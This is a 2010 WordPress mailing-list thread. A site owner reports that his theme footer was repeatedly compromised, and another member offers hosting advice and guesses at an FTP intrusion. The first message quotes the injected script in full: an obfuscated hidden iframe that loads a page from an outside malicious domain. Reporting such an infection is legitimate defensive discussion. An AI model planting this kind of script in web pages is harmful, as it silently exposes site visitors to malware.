[wp-hackers] wordpress theme script injection (hosted on dreamhost)

Vid Luther vid at zippykid.com
Sun Oct 31 16:51:32 UTC 2010


try the free wordpress.com account? :) we just want you to stick with
wordpress :)

Mladen Adamovic wrote:
> Regarding hosting - I have other websites hosted at my dreamhost account and
> they haven't been hacked hacked so far . That's good otherwise I'll have
> days of work to fix it.
>
> Godaddy has slow and unresponsive panel comparing to dreamhost - I have some
> websites hosted there as well.
>
> I understand that some individuals and companies are offering Wordpress
> hosting however for me Blogger could do - and it's free. Since my blog has
> around 25 readers I don't have economical reasons to pay for managed
> wordpress hosting.
>
> Regards
>
>
>
> On Sun, Oct 31, 2010 at 4:17 PM, Vid Luther <vid at zippykid.com> wrote:
>
>> Mladen,
>>  Instead of switching platforms completely, I would recommend first
>> changing hosts, go with mediatemple, godaddy, rackspace, page.ly,
>> wpengine, my company, or even godaddy.. their UI sucks, but their phone
>> support is fairly decent.
>>
>> As for the exploit, it may not be a wordpress exploit, but an ftp
>> attack, as it's just looking for filesystem paths and injecting to it.
>>
>> I'm assuming by default theme footer, you meant twentyten theme, and
>> footer.php ?
>>
>>
>>
>> Mladen Adamovic wrote:
>>> Hi guys,
>>>
>>> My wordpress software instance was repeatedly hacked ... running latest
>>> Wordpress source code and being hosted on Dreamhost.
>>>
>>> I don't know which exploit it did use and couldn't identify it, but it
>> was
>>> adding the following code to my default theme footer.php:
>>>
>>> <script>
>>> enc =
>>>
>> "%3Ciframe%20width%3D1%20height%3D1%20border%3D0%20frameborder%3D0%20src%3D%27http%3A//
>>> withthefirstgo.com/4/amyvaojujqinjpfqx.php%27%3E%3C/iframe%3E";
>>> dec = unescape(enc);
>>> document.write(dec);
>>> </script>
>>>
>>> I think I'll have to migrate to Blogger, since I couldn't identify
>> exploit
>>> it did use.
>>>
>>> I wanted to drop you an email anyhow since identifying exploits is
>>> important!
>>> _______________________________________________
>>> wp-hackers mailing list
>>> wp-hackers at lists.automattic.com
>>> http://lists.automattic.com/mailman/listinfo/wp-hackers
>> --
>> Vid Luther
>> Founder
>> ZippyKid
>> http://zippykid.com/
>> 210-789-0369
>> _______________________________________________
>> wp-hackers mailing list
>> wp-hackers at lists.automattic.com
>> http://lists.automattic.com/mailman/listinfo/wp-hackers
>>
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers

-- 
Vid Luther
Founder
ZippyKid
http://zippykid.com/
210-789-0369


More information about the wp-hackers mailing list